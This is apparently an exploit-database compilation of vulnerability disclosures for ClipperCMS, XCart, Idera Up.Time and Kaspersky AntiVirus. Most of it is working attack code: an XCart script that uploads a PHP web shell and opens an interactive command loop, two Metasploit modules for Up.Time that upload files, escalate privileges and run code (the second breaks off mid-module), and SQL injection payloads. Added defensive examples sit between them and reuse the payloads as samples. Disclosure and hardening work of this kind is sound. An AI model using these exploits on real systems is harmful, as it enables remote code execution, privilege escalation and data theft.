&comment=&failedlogincount=0&blocked=0&blockeduntil=&blockedafter=&manager_language=english&manager_login_startup=&allow_manager_access=1&allowed_ip=&manager_theme=&filemanager_path=&upload_images=&default_upload_images=1&upload_media=&default_upload_media=1&upload_flash=&default_upload_flash=1&upload_files=&default_upload_files=1&upload_maxsize=&which_editor=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_editor_theme=&tinymce_custom_plugins=&tinymce_custom_buttons1=&tinymce_custom_buttons2=&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&photo=&save=Submit+Query

Visiting the overview page of that user will show the result of the injected query (in the fax field).

Code

/manager/processors/save_user_processor.php

$sql = "UPDATE " . $modx->getFullTableName('user_attributes') . " SET fullname='$fullname', role='$roleid', email='$email', phone='$phone', mobilephone='$mobilephone', fax='$fax', zip='$zip', state='$state', country='$country', gender='$gender', dob='$dob', photo='$photo', comment='$comment', failedlogincount='$failedlogincount', blocked=$blocked, blockeduntil=$blockeduntil, blockedafter=$blockedafter WHERE internalKey=$id";

6. Solution

This issue has not been fixed by the vendor.

7. Report Timeline

10/02/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/ClipperCMS-130-SQL-Injection-99.html
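Two of the injections on this page are worth seeing side by side with their fix: the AlegroCart `check_download` query, where the payload arrives second-hand through a file name that was stored on disk earlier, and the ClipperCMS `user_attributes` UPDATE, where the `gender` value is used to rewrite a neighbouring column (`fax`) in the same SET list. The script below is an added example, not code from either project: it reproduces both statement shapes against an in-memory SQLite database and runs each beside a parameterised version. SQLite has no `BENCHMARK()`, so the AlegroCart file name uses a boolean tautology instead of the advisory's time-based test, and a local `secrets` table stands in for `mysql.user`. All table contents are constructed.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the two vulnerable tables plus a 'secrets'
    table that plays the role of mysql.user in the advisories' payloads."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE download (download_id INTEGER PRIMARY KEY, filename TEXT);
        INSERT INTO download (filename) VALUES ('manual.pdf'), ('invoice.zip');
        CREATE TABLE user_attributes (internalKey INTEGER PRIMARY KEY, fax TEXT, gender TEXT, dob TEXT);
        INSERT INTO user_attributes VALUES (3, '', '1', '');
        CREATE TABLE secrets (user TEXT);
        INSERT INTO secrets VALUES ('root@localhost');
    """)
    return db


# AlegroCart shape: "select * from download where filename = '".$filename."'"
# $filename comes from glob() over the download directory, so the payload is
# whatever name the attacker managed to store there earlier.
def check_download_vulnerable(db, filename):
    sql = "select * from download where filename = '" + filename + "'"
    return db.execute(sql).fetchall()


def check_download_fixed(db, filename):
    return db.execute("select * from download where filename = ?", (filename,)).fetchall()


# ClipperCMS shape: "... gender='$gender', dob='$dob', ... WHERE internalKey=$id"
def save_user_vulnerable(db, user_id, gender, dob=""):
    sql = ("UPDATE user_attributes SET gender='" + gender + "', dob='" + dob +
           "' WHERE internalKey=" + str(user_id))
    db.execute(sql)
    return db.execute("SELECT fax, gender FROM user_attributes WHERE internalKey=?",
                      (user_id,)).fetchone()


def save_user_fixed(db, user_id, gender, dob=""):
    db.execute("UPDATE user_attributes SET gender=?, dob=? WHERE internalKey=?",
               (gender, dob, user_id))
    return db.execute("SELECT fax, gender FROM user_attributes WHERE internalKey=?",
                      (user_id,)).fetchone()


# Constructed payloads (see lead-in for the substitutions made for SQLite).
FILENAME_PAYLOAD = "image.jpg' OR '1'='1"
GENDER_PAYLOAD = "2', fax=(SELECT user FROM secrets LIMIT 1), dob='0"

if __name__ == "__main__":
    db = make_db()
    print("rows returned for stored file name:", check_download_vulnerable(db, FILENAME_PAYLOAD))
    print("fax/gender after vulnerable update:", save_user_vulnerable(db, 3, GENDER_PAYLOAD))
    print("fax/gender after fixed update:", save_user_fixed(make_db(), 3, GENDER_PAYLOAD))
```

The gender payload closes its own quote, appends `fax=(SELECT ...)`, and reopens a quote for the `dob` assignment that follows in the original statement, so the string stays syntactically valid; the duplicate `dob` assignment that results is accepted by both MySQL and SQLite. With placeholders the same string is simply stored in `gender`, and `fax` is untouched.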
-
XCart 5.2.6 - Code Execution
#!/usr/bin/env python3
# Exploit for XCart 5.2.6 Code Execution vulnerability
# An admin account is required to use this exploit
# Curesec GmbH

import re
import sys

import requests  # requires requests lib

if len(sys.argv) != 4:
    exit("usage: python " + sys.argv[0] + " http://example.com/xcart/ admin@example.com admin")

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

loginPath = "/admin.php?target=login"
fileManagerPath = "/admin.php?target=logo_favicon"
shellFileName = "404.php"
# GIF header first so the file passes as an image, PHP after it.
shellContent = "GIF89a;<?php passthru($_GET['x']); ?>"


def login(requestSession, url, username, password):
    csrfRequest = requestSession.get(url)
    csrfTokenRegEx = re.search('name="xcart_form_id" type="hidden" value="(.*)" class', csrfRequest.text)
    csrfToken = csrfTokenRegEx.group(1)
    postData = {"target": "login", "action": "login", "xcart_form_id": csrfToken, "login": username, "password": password}
    loginResult = requestSession.post(url, data=postData).text
    return "Invalid login or password" not in loginResult


def upload(requestSession, url, fileName, fileContent):
    csrfRequest = requestSession.get(url)
    csrfTokenRegEx = re.search('SimpleCMS" />\n<input type="hidden" name="xcart_form_id" value="(.*)" />', csrfRequest.text)
    csrfToken = csrfTokenRegEx.group(1)
    filesData = {"logo": (fileName, fileContent)}
    postData = {"target": "logo_favicon", "action": "update", "page": "CDev\\SimpleCMS", "xcart_form_id": csrfToken}
    uploadResult = requestSession.post(url, files=filesData, data=postData)
    return "The data has been saved successfully" in uploadResult.text


def runShell(url):
    print("enter command, or enter exit to quit.")
    command = input("$ ")
    while "exit" not in command:
        print(requests.get(url + command).text.replace("GIF89a;", ""))
        command = input("$ ")


requestSession = requests.session()

if login(requestSession, url + loginPath, username, password):
    print("successful: login")
else:
    exit("ERROR: Incorrect username or password")

if upload(requestSession, url + fileManagerPath, shellFileName, shellContent):
    print("successful: file uploaded")
else:
    exit("ERROR: could not upload file")

runShell(url + shellFileName + "?x=")

# Blog Reference:
# http://blog.curesec.com/article/blog/XCart-526-Code-Execution-Exploit-87.html
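The ClipperCMS and XCart exploits above use the two standard tricks against an upload handler: a dotfile (`.htaccess`) that changes how the directory is served, and a file whose name (`404.php`) or body (`GIF89a;<?php ...`) carries PHP past an image check. The validator below is an added example, not code from either project: it applies an extension allow-list, checks the magic bytes that the extension implies, refuses dotfiles and double extensions, and rejects image data containing a PHP open tag. The sample uploads are constructed from the two exploits plus a minimal PNG header.

```python
import os
import re

# Extension -> magic bytes the content must start with. Everything else is refused.
IMAGE_MAGIC = {
    "png":  b"\x89PNG\r\n\x1a\n",
    "gif":  b"GIF8",
    "jpg":  b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
}
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def validate_upload(filename: str, content: bytes):
    """Return (accepted, reason) for a file-manager upload."""
    name = os.path.basename(filename.replace("\\", "/"))
    if not name or name.startswith("."):
        return False, "dotfiles (e.g. .htaccess) are refused"
    parts = name.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "exactly one extension is required"
    ext = parts[1]
    if ext not in IMAGE_MAGIC:
        return False, "extension ." + ext + " is not an allowed image type"
    if not content.startswith(IMAGE_MAGIC[ext]):
        return False, "content does not match ." + ext
    if PHP_OPEN_TAG.search(content):
        return False, "PHP open tag inside image data"
    return True, "ok"


# Constructed samples: the uploads made by the two exploits and a bare PNG header.
SAMPLES = {
    ".htaccess": b"AddType application/x-httpd-php .png",
    "404.png":   b"<?php passthru($_GET['x']) ?>",
    "404.php":   b"GIF89a;<?php passthru($_GET['x']); ?>",
    "logo.gif":  b"GIF89a;<?php passthru($_GET['x']); ?>",
    "logo.png":  b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, validate_upload(name, body))
```

The content scan is a heuristic (a genuine image can contain the bytes `<?=`), so it complements rather than replaces the server-side controls the ClipperCMS exploit itself depends on: the upload directory should be served with PHP disabled and `AllowOverride None`, so that neither a stray `.htaccess` nor a polyglot file is ever handed to the interpreter.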
-
Idera Up.Time Monitoring Station 7.0 - 'post2file.php' Arbitrary File Upload (Metasploit)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload',
      'Description'    => %q{
        This module exploits an arbitrary file upload vulnerability found within the Up.Time
        monitoring server 7.2 and below. A malicious entity can upload a PHP file into the
        webroot without authentication, leading to arbitrary code execution. Although the
        vendor fixed Up.Time to prevent this vulnerability, it was not properly mitigated.
        To exploit against a newer version of Up.Time (such as 7.4), please use
        exploits/multi/http/uptime_file_upload_2.
      },
      'Author'         =>
        [
          'Denis Andzakovic <denis.andzakovic[at]security-assessment.com>' # Vulnerability discovery and MSF module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '100423' ],
          [ 'BID', '64031' ],
          [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf' ]
        ],
      'Payload'        =>
        {
          'Space'       => 10000, # just a big enough number to fit any PHP payload
          'DisableNops' => true
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Up.Time 7.0/7.2', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Nov 19 2013'))

    register_options([
      OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']),
      Opt::RPORT(9999)
    ], self.class)
  end

  def check
    uri = target_uri.path
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(uri, 'wizards', 'post2file.php')
    })

    if res and res.code == 500 and res.body.to_s =~ /<title><\/title>/
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    print_status("#{peer} - Uploading PHP to Up.Time server")
    uri = target_uri.path
    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self => true)

    # post2file.php writes the 'script' body to the file named by 'file_name'.
    post_data = ({
      "file_name" => @payload_name,
      "script"    => php_payload
    })

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(uri, 'wizards', 'post2file.php'),
      'vars_post' => post_data,
    })

    unless res and res.code == 200 and res.body.to_s =~ /<title><\/title>/
      fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_cgi({
      'uri'    => normalize_uri(uri, 'wizards', @payload_name),
      'method' => 'GET'
    })
  end
end
-
Kaspersky AntiVirus - '.DEX' File Format Memory Corruption
Source: https://code.google.com/p/google-security-research/issues/detail?id=529

The attached testcase was found by fuzzing DEX files, and results in a heap overflow with a wild memcpy. Note that Kaspersky catches exceptions and continues execution, so running into unmapped pages doesn't terminate the process; this should make exploitation quite realistic.

In the crash below, ecx (the remaining dword count for rep movs) is 0x3ffd419c, i.e. a copy length of roughly 4 GB, and edi has just crossed into the unmapped page at 0c170000.

(bb8.ac0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0b2074 ebx=ffffffff ecx=3ffd419c edx=00000003 esi=0c161a01 edi=0c170000
eip=72165157 esp=046ceed8 ebp=046ceee0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
avengine_dll!ekaGetObjectFactory+0x51537:
72165157 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:023> dd edi
0c170000  ???????? ???????? ???????? ????????
0c170010  ???????? ???????? ???????? ????????
0c170020  ???????? ???????? ???????? ????????
0c170030  ???????? ???????? ???????? ????????
0c170040  ???????? ???????? ???????? ????????
0c170050  ???????? ???????? ???????? ????????
0c170060  ???????? ???????? ???????? ????????
0c170070  ???????? ???????? ???????? ????????
0:023> dd esi
0c161a01  00000000 00000000 00000000 00000000
0c161a11  00000000 00000000 00000000 00000000
0c161a21  00000000 00000000 00000000 00000000
0c161a31  00000000 00000000 00000000 00000000
0c161a41  00000000 00000000 00000000 00000000
0c161a51  00000000 00000000 00000000 00000000
0c161a61  00000000 00000000 00000000 00000000
0c161a71  00000000 00000000 00000000 00000000
0:023> kvn1
 # ChildEBP RetAddr  Args to Child
00 046ceee0 15c01af7 0c0c0674 0c0b2075 ffffffff avengine_dll!ekaGetObjectFactory+0x51537

This vulnerability is exploitable for remote code execution as NT AUTHORITY\SYSTEM.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38735.zip
-
Kaspersky AntiVirus - Certificate Handling Directory Traversal
Source: https://code.google.com/p/google-security-research/issues/detail?id=539

When Kaspersky https inspection is enabled, temporary certificates are created in %PROGRAMDATA% for validation. I observed that the naming pattern is {CN}.cer. I created a certificate with CN="../../../../Users/All Users/Start Menu/Startup/foo.bat\x00", browsed to an SSL server presenting that certificate and Kaspersky created that certificate name.

Jumping from this to code execution seems quite straightforward. I didn't try it, but it seems quite easy to make some ASN.1/X.509 that is also a valid batch file or some other relaxed-parsing format.

Here is how to generate a certificate to reproduce:

$ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 360
Generating a 2048 bit RSA private key
......................................................................+++
...............+++
writing new private key to 'key.pem'
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:../../../../../Users/All Users/Desktop/hello
Email Address []:

Then, to test, start a server like this:

$ openssl s_server -key key.pem -cert cert.pem -accept 8080

And then navigate to https://host:8080 from the Windows host, and observe a certificate called hello.cer on the desktop. I attached a screenshot to demonstrate.

I can't believe this actually worked; note that it's not necessary to click or interact with anything to produce the file.
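The defect above is a file name derived directly from an attacker-chosen CN. The following is an added example, not code from the report or from Kaspersky, showing the naive {CN}.cer pattern beside a hardened derivation that rejects NUL bytes, strips separators, and re-checks that the final path stays inside the store; the store directory, the DER stand-in and all function names are assumptions for the demonstration.

```python
import hashlib
import os
import re

# Constructed store directory for this demonstration; the product's real
# %PROGRAMDATA% location is not modelled.
CERT_STORE = os.path.abspath("cert_cache")

# The CN from the report, and a constructed stand-in for the certificate's DER.
EVIL_CN = "../../../../Users/All Users/Start Menu/Startup/foo.bat\x00"
FAKE_DER = b"\x30\x82\x01\x00constructed-der-stand-in"

# Path separators, NUL and other control characters, and the characters
# Windows refuses in file names.
_UNSAFE = re.compile(r'[\\/\x00-\x1f<>:"|?*]')
# Device names Windows treats specially regardless of extension.
_WIN_RESERVED = ({"CON", "PRN", "AUX", "NUL"}
                 | {f"COM{i}" for i in range(1, 10)}
                 | {f"LPT{i}" for i in range(1, 10)})


class UnsafeCommonName(ValueError):
    """Raised when a CN cannot be turned into a safe file name."""


def inside_store(path: str, store: str = CERT_STORE) -> bool:
    """True only if path resolves to a location strictly below the store."""
    path, store = os.path.abspath(path), os.path.abspath(store)
    return path != store and os.path.commonpath([store, path]) == store


def naive_cert_path(cn: str, store: str = CERT_STORE) -> str:
    """The {CN}.cer pattern the report describes, with no validation.

    A C file API stops at the first NUL, so an embedded \\x00 also drops the
    ".cer" suffix; the split() models that truncation.
    """
    return os.path.abspath(os.path.join(store, f"{cn}.cer").split("\x00", 1)[0])


def cert_filename(cn: str, der: bytes) -> str:
    """Derive a file name that cannot leave the store, whatever the CN contains.

    Anyone can present a certificate with any CN, so the CN is only a
    sanitised, length-capped prefix; uniqueness comes from a hash of the DER.
    """
    if "\x00" in cn:
        # Dropping the NUL would change the name a C API sees; reject outright.
        raise UnsafeCommonName("NUL byte in common name")
    stem = _UNSAFE.sub("_", cn)[:64].strip(" .")
    if not stem or stem.split(".", 1)[0].upper() in _WIN_RESERVED:
        stem = "cert"
    digest = hashlib.sha256(der).hexdigest()[:16]
    return f"{stem}-{digest}.cer"


def hardened_cert_path(cn: str, der: bytes, store: str = CERT_STORE) -> str:
    """Join the sanitised name to the store and re-check containment."""
    path = os.path.abspath(os.path.join(store, cert_filename(cn, der)))
    if not inside_store(path, store):  # defence in depth; should never trigger
        raise UnsafeCommonName("derived path escapes the certificate store")
    return path


if __name__ == "__main__":
    naive = naive_cert_path(EVIL_CN)
    print("naive   :", naive, "inside store?", inside_store(naive))
    try:
        hardened_cert_path(EVIL_CN, FAKE_DER)
    except UnsafeCommonName as exc:
        print("hardened: rejected ->", exc)
    print("hardened:", hardened_cert_path("../../../../../Users/All Users/Desktop/hello", FAKE_DER))
```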
-
Idera Up.Time Monitoring Station 7.4 - 'post2file.php' Arbitrary File Upload (Metasploit)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'nokogiri'

class Metasploit4 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload',
      'Description'    => %q{
        This module exploits a vulnerability found in Uptime version 7.4.0 and 7.5.0. The
        vulnerability began as a classic arbitrary file upload vulnerability in post2file.php,
        which can be exploited by exploits/multi/http/uptime_file_upload_1.rb, but it was
        mitigated by the vendor. Although the mitigation in place will prevent
        uptime_file_upload_1.rb from working, it can still be bypassed and gain privilege
        escalation, and allows the attacker to upload file again, and execute arbitrary
        commands.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Denis Andzakovic', # Found file upload bug in post2file.php in 2013
          'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>',
          'Gjoko Krstic(LiquidWorm) <gjoko[at]zeroscience.mk>'
        ],
      'References'     =>
        [
          ['EDB', '37888'],
          ['URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5254.php']
        ],
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Automatic', {}]],
      'Privileged'     => 'true',
      'DefaultTarget'  => 0,
      # The post2file.php vuln was reported in 2013 by Denis Andzakovic. And then on Aug 2015,
      # it was discovered again by Ewerson 'Crash' Guimaraes.
      'DisclosureDate' => 'Nov 18 2013'
    ))

    register_options(
      [
        Opt::RPORT(9999),
        OptString.new('USERNAME', [true, 'The username to authenticate as', 'sample']),
        OptString.new('PASSWORD', [true, 'The password to authenticate with', 'sample'])
      ], self.class)

    register_advanced_options(
      [
        OptString.new('UptimeWindowsDirectory', [true, 'Uptime installation path for Windows', 'C:\\Program Files\\uptime software\\']),
        OptString.new('UptimeLinuxDirectory', [true, 'Uptime installation path for Linux', '/usr/local/uptime/']),
        OptString.new('CmdPath', [true, 'Path to cmd.exe', 'c:\\windows\\system32\\cmd.exe'])
      ], self.class)
  end

  def print_status(msg='')
    super("#{rhost}:#{rport} - #{msg}")
  end

  def print_error(msg='')
    super("#{rhost}:#{rport} - #{msg}")
  end

  def print_good(msg='')
    super("#{rhost}:#{rport} - #{msg}")
  end

  # Application Check
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path)
    )

    unless res
      vprint_error("Connection timed out.")
      return Exploit::CheckCode::Unknown
    end

    n = Nokogiri::HTML(res.body)
    uptime_text = n.at('//ul[@id="uptimeInfo"]//li[contains(text(), "up.time")]')
    if uptime_text
      version = uptime_text.text.scan(/up\.time ([\d\.]+)/i).flatten.first
      vprint_status("Found version: #{version}")
      if version >= '7.4.0' && version <= '7.5.0'
        return Exploit::CheckCode::Appears
      end
    end

    Exploit::CheckCode::Safe
  end

  def create_exec_service(*args)
    cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs = *args
    res_service = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'main.php'),
      'cookie'    => "#{cookie_split[1]}; #{cookie_split[2]}",
      'vars_get'  => {
        'section'    => 'ERDCInstance',
        'subsection' => 'add',
      },
      'vars_post' => {
        'initialERDCId'                      => '20',
        'target'                             => '1',
        'targetType'                         => 'systemList',
        'systemList'                         => '1',
        'serviceGroupList'                   => '-10',
        'initialMode'                        => 'standard',
        'erdcName'                           => 'Exploit',
        'erdcInitialName'                    => '',
        'erdcDescription'                    => 'Exploit',
        'hostButton'                         => 'system',
        'erdc_id'                            => '20',
        'forceReload'                        => '0',
        'operation'                          => 'standard',
        'erdc_instance_id'                   => '',
        'label_[184]'                        => 'Script Name',
        'value_[184]'                        => cmd,
        'id_[184]'                           => 'process',
        'name_[process]'                     => '184',
        'units_[184]'                        => '',
        'guiBasic_[184]'                     => '1',
        'inputType_[184]'                    => 'GUIString',
        'screenOrder_[184]'                  => '1',
        'parmType_[184]'                     => '1',
        'label_[185]'                        => 'Arguments',
        'value_[185]'                        => cmdargs,
        'id_[185]'                           => 'args',
        'name_[args]'                        => '185',
        'units_[185]'                        => '',
        'guiBasic_[185]'                     => '1',
        'inputType_[185]'                    => 'GUIString',
        'screenOrder_[185]'                  => '2',
        'parmType_[185]'                     => '1',
        'label_[187]'                        => 'Output',
        'can_retain_[187]'                   => 'false',
        'comparisonWarn_[187]'               => '-1',
        'comparison_[187]'                   => '-1',
        'id_[187]'                           => 'value_critical_output',
        'name_[output]'                      => '187',
        'units_[187]'                        => '',
        'guiBasic_[187]'                     => '1',
        'inputType_[187]'                    => 'GUIString',
        'screenOrder_[187]'                  => '4',
        'parmType_[187]'                     => '2',
        'label_[189]'                        => 'Response time',
        'can_retain_[189]'                   => 'false',
        'comparisonWarn_[189]'               => '-1',
        'comparison_[189]'                   => '-1',
        'id_[189]'                           => 'value_critical_timer',
        'name_[timer]'                       => '189',
        'units_[189]'                        => 'ms',
        'guiBasic_[189]'                     => '0',
        'inputType_[189]'                    => 'GUIInteger',
        'screenOrder_[189]'                  => '6',
        'parmType_[189]'                     => '2',
        'timing_[erdc_instance_monitored]'   => '1',
        'timing_[timeout]'                   => '60',
        'timing_[check_interval]'            => '10',
        'timing_[recheck_interval]'          => '1',
        'timing_[max_rechecks]'              => '3',
        'alerting_[notification]'            => '1',
        'alerting_[alert_interval]'          => '120',
        'alerting_[alert_on_critical]'       => '1',
        'alerting_[alert_on_warning]'        => '1',
        'alerting_[alert_on_recovery]'       => '1',
        'alerting_[alert_on_unknown]'        => '1',
        'time_period_id'                     => '1',
        'pageFinish'                         => 'Finish',
        'pageContinue'                       => 'Continue...',
        'isWizard'                           => '1',
        'wizardPage'                         => '2',
        'wizardNumPages'                     => '2',
        'wizardTask'                         => 'pageFinish',
        'visitedPage[1]'                     => '1',
        'visitedPage[2]'                     => '1'
      })
  end

  def exploit
    vprint_status('Trying to login...')

    # Application Login
    res_auth = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'index.php'),
      'vars_post' => {
        'username' => datastore['USERNAME'],
        'password' => datastore['PASSWORD']
      })

    unless res_auth
      fail_with(Failure::Unknown, 'Connection timed out while trying to login')
    end

    # Check OS
    phpfile_name = rand_text_alpha(10)
    if res_auth.headers['Server'] =~ /Unix/
      vprint_status('Found Linux installation - Setting appropriated PATH')
      phppath = Rex::FileUtils.normalize_unix_path(datastore['UptimeLinuxDirectory'], 'apache/bin/ph')
      uploadpath = Rex::FileUtils.normalize_unix_path(datastore['UptimeLinuxDirectory'], 'GUI/wizards')
      cmdargs = "#{uploadpath}#{phpfile_name}.txt"
      cmd = phppath
    else
      vprint_status('Found Windows installation - Setting appropriated PATH')
      phppath = Rex::FileUtils.normalize_win_path(datastore['UptimeWindowsDirectory'], 'apache\\php\\php.exe')
      uploadpath = Rex::FileUtils.normalize_win_path(datastore['UptimeWindowsDirectory'], 'uptime\\GUI\\wizards\\')
      cmd = datastore['CmdPath']
      cmdargs = "/K \"\"#{phppath}\" \"#{uploadpath}#{phpfile_name}.txt\"\""
    end

    if res_auth.get_cookies =~ /login=true/
      cookie = Regexp.last_match(1)
      cookie_split = res_auth.get_cookies.split(';')
      vprint_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
      print_good('Login success')

      # Privilege escalation getting user ID
      res_priv = send_request_cgi(
        'method'   => 'GET',
        'uri'      => normalize_uri(target_uri.path, 'main.php'),
        'vars_get' => {
          'page'    => 'Users',
          'subPage' => 'UserContainer'
        },
        'cookie'   => "#{cookie_split[1]}; #{cookie_split[2]}"
      )

      unless res_priv
        fail_with(Failure::Unknown, 'Connection timed out while getting userID.')
      end

      matchdata = res_priv.body.match(/UPTIME\.CurrentUser\.userId\.*/)
      unless matchdata
        fail_with(Failure::Unknown, 'Unable to find userID for escalation')
      end

      get_id = matchdata[0].gsub(/[^\d]/, '')
      vprint_status('Escalating privileges...')

      # Privilege escalation post
      res_priv_elev = send_request_cgi(
        'method'    => 'POST',
        'uri'       => normalize_uri(target_uri.path, 'main.php'),
        'vars_get'  => {
          'section'    => 'UserContainer',
          'subsection' => 'edit',
          'id'         => "#{get_id}"
        },
        'cookie'    => "#{cookie_split[1]}; #{cookie_split[2]}",
        'vars_post' => {
          'operation'                       => 'submit',
          'disableEditOfUsernameRoleGroup'  => 'false',
          'username'                        => datastore['USERNAME'],
          'password'                        => datastore['PASSWORD'],
          'passwordConfirm'                 => datastore['PASSWORD'],
          'firstname'                       => rand_text_alpha(10),
          'lastname'                        => rand_text_alpha(10),
          'location'                        => '',
          'emailaddress'                    => '',
          'emailtimeperiodid'               => '1',
          'phonenumber'                     => '',
          'phonenumbertimeperiodid'         => '1',
          'windowshost'                     => '',
          'windowsworkgroup'                => '',
          'windowspopuptimeperiodid'        => '1',
          'landingpage'                     => 'MyPortal',
          'isonvacation'                    => '0',
          'receivealerts'                   => '0',
          'activexgraphs'                   => '0',
          'newuser'                         => 'on',
          'newuser'                         => '1',
          'userroleid'                      => '1',
          'usergroupid[]'                   => '1'
        }
      )

      unless res_priv_elev
        fail_with(Failure::Unknown, 'Connection timed out while escalating...')
      end

      # Refreshing perms
      vprint_status('Refreshing perms...')
      res_priv = send_request_cgi(
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path, 'index.php?loggedout'),
        'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}"
      )

      unless res_priv
        fail_with(Failure::Unknown, 'Connection timed out while refreshing perms')
      end

      res_auth = send_request_cgi(
        'method'    => 'POST',
        'uri'       => normalize_uri(target_uri.path, 'index.php'),
        'vars_post' => {
          'username' => datastore['USERNAME'],
          'password' => datastore['PASSWORD']
        }
      )

      unless res_auth
        fail_with(Failure::Unknown, 'Connection timed out while authenticating...')
      end

      if res_auth.get_cookies =~ /login=true/
        cookie = Regexp.last_match(1)
        cookie_split = res_auth.get_cookies.split(';')
        vprint_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
        print_good('Priv. Escalation success')
      end

      # CREATING Linux EXEC Service
      if res_auth.headers['Server'] =~ /Unix/
        vprint_status('Creating Linux Monitor Code exec...')
        create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs)
      else
        # CREATING Windows EXEC Service
        vprint_status('Creating Windows Monitor Code exec...')
        create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs)
      end

      # Upload file
      vprint_status('Uploading file...')
      up_res = send_request_cgi(
        'method'    => 'POST',
        'uri'       => normalize_uri(target_uri.path, 'wizards', 'post2file.php'),
        'vars_post' => {
          'file_name' => "#{phpfile_name}.txt",
          'script'    => payload.encoded
        }
      )

      unless up_res
        fail_with(Failure::Unknown, 'Connection timed out while uploading file.')
      end

      vprint_status('Checking Uploaded file...')
      res_up_check = send_request_cgi(
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path, 'wizards', "#{phpfile_name}.txt")
      )

      if res_up_check && res_up_check.code == 200
        print_good("File found: #{phpfile_name}")
      else
        print_error('File not found')
        return
      end

      # Get Monitor ID
      vprint_status('Fetching Monitor ID...')
      res_mon_id = send_request_cgi(
        'method'   => 'GET',
        'uri'      => normalize_uri(target_uri.path, 'ajax', 'jsonQuery.php'),
        'cookie'   => "#{cookie_split[1]}; #{cookie_split[2]}",
        'vars_get' => {
          'query'          => 'GET_SERVICE_PAGE_ERDC_LIST',
          'iDisplayStart'  => '0',
          'iDisplayLength' => '10',
          'sSearch'        => 'Exploit'
        }
      )

      unless res_mon_id
        fail_with(Failure::Unknown, 'Connection timed out while fetching monitor ID')
      end

      matchdata = res_mon_id.body.match(/id=?[^>]*>/)
      unless matchdata
        fail_with(Failure::Unknown, 'No monitor ID found in HTML body. Unable to continue.')
      end

      mon_get_id = matchdata[0].gsub(/[^\d]/, '')
      print_good("Monitor id acquired:#{mon_get_id}")

      # Executing monitor
      send_request_cgi(
        'method'    => 'POST',
        'uri'       => normalize_uri(target_uri.path, 'main.php'),
        'cookie'    => "#{cookie_split[1]}; #{cookie_split[2]}",
        'vars_post' => {
          'section'    => 'RunERDCInstance',
          'subsection' => 'view',
          'id'         => mon_get_id,
          'name'       => 'Exploit'
